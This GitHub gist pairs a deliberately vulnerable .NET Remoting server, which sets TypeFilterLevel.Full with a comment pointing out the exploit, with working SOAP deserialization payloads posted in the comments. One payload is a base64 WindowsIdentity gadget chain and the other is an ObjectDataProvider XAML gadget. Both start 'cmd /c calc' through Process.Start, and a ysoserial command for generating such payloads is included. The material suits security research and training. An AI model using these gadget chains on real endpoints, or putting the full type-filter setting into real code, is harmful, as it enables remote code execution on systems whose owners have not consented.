Skip to content

Instantly share code, notes, and snippets.

@adon90

adon90/VulnerableDotNetHTTPRemoting.cs

Created March 20, 2019 17:24
Show Gist options
  • Save adon90/0f5445234332a2bf638a57e38ecc3102 to your computer and use it in GitHub Desktop.
Save adon90/0f5445234332a2bf638a57e38ecc3102 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
VulnerableDotNetHTTPRemoting.cs
using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Http;
using System.Runtime.Serialization.Formatters;
namespace ExampleRemoting
{
public class DateTimeServer : MarshalByRefObject, IDisposable
{
public DateTimeServer()
{
Console.WriteLine("DateTime server activated");
}
~DateTimeServer()
{
Console.WriteLine("DateTime server Object Destroyed.");
}
public void Dispose()
{
GC.SuppressFinalize(this);
}
public String MyMethod(String name)
{
String strMessage = "Hi " + name + ". Here is the current DateTime: " + DateTime.Now;
Console.WriteLine(strMessage);
return strMessage;
}
}
public class Server
{
public static void Main()
{
SoapServerFormatterSinkProvider soapServerFormatterSinkProvider = new SoapServerFormatterSinkProvider()
{
TypeFilterLevel = TypeFilterLevel.Full // This is where we can exploit it without knowing anything about the application or having an 0day! Could be TypeFilterLevel.Low
};
IDictionary hashtables = new Hashtable();
hashtables["port"] = 9999;
hashtables["proxyName"] = null;
hashtables["name"] = "Test Remoting Services";
/* Creating the channel using SoapServerFormatterSinkProvider */
//HttpChannel channel = new HttpChannel(9999);
HttpChannel channel = new HttpChannel(hashtables, null, soapServerFormatterSinkProvider);
ChannelServices.RegisterChannel(channel,false);
RemotingConfiguration.RegisterWellKnownServiceType(typeof(DateTimeServer), "TuPutisimaMadreEnPatinete.soap", WellKnownObjectMode.Singleton);
System.Console.WriteLine("press <enter> to exit.");
System.Console.ReadLine();
}
public String MyMethod(String name)
{
String strMessage = "Hi " + name + ". Here is the current DateTime: " + DateTime.Now;
Console.WriteLine(strMessage);
return strMessage;
}
}
}
@adon90
Copy link
Author

adon90 commented Mar 20, 2019

Payload:

<aDoN:Envelope xmlns:aDoN="http://schemas.xmlsoap.org/soap/envelope/">

<aDoN:Header/>

    <a1:WindowsIdentity id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">

      <System.Security.ClaimsIdentity.bootstrapContext xmlns="">AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAAcvYyBjYWxjBgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQkPAAAACQ0AAAAJDgAAAAYUAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhUAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEKAAAACQAAAAYWAAAAB0NvbXBhcmUJDAAAAAYYAAAADVN5c3RlbS5TdHJpbmcGGQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpBhoAAAAyU3lzdGVtLkludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykIAAAACgEQAAAACAAAAAYbAAAAcVN5c3RlbS5Db21wYXJpc29uYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCQwAAAAKCQwAAAAJGAAAAAkWAAAACgs=</System.Security.ClaimsIdentity.bootstrapContext>

    </a1:WindowsIdentity>

</aDoN:Envelope>

@adon90
Copy link
Author

adon90 commented Mar 20, 2019

Payload 2:

<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

<a1:TextFormattingRunProperties id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35">

<ForegroundBrush id="ref-3">&#60;ResourceDictionary

 xmlns=&#34;http://schemas.microsoft.com/winfx/2006/xaml/presentation&#34;

 xmlns:x=&#34;http://schemas.microsoft.com/winfx/2006/xaml&#34;

 xmlns:System=&#34;clr-namespace:System;assembly=mscorlib&#34;

 xmlns:Diag=&#34;clr-namespace:System.Diagnostics;assembly=system&#34;&#62;

 &#60;ObjectDataProvider x:Key=&#34;LaunchCalc&#34; ObjectType = &#34;{ x:Type Diag:Process}&#34; MethodName = &#34;Start&#34; &#62;

 &#60;ObjectDataProvider.MethodParameters&#62;

 &#60;System:String&#62;cmd&#60;/System:String&#62;

 &#60;System:String&#62;/c &#34;calc&#34; &#60;/System:String&#62;

 &#60;/ObjectDataProvider.MethodParameters&#62;

 &#60;/ObjectDataProvider&#62;

&#60;/ResourceDictionary&#62;</ForegroundBrush>

</a1:TextFormattingRunProperties>

</SOAP-ENV:Envelope>

@adon90
Copy link
Author

adon90 commented Mar 20, 2019

ysoserial.exe -f SoapFormatter -g WindowsIdentity -c "calc" -o raw -t

@0xVIC
Copy link

0xVIC commented Mar 20, 2019

Nice aDon90

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment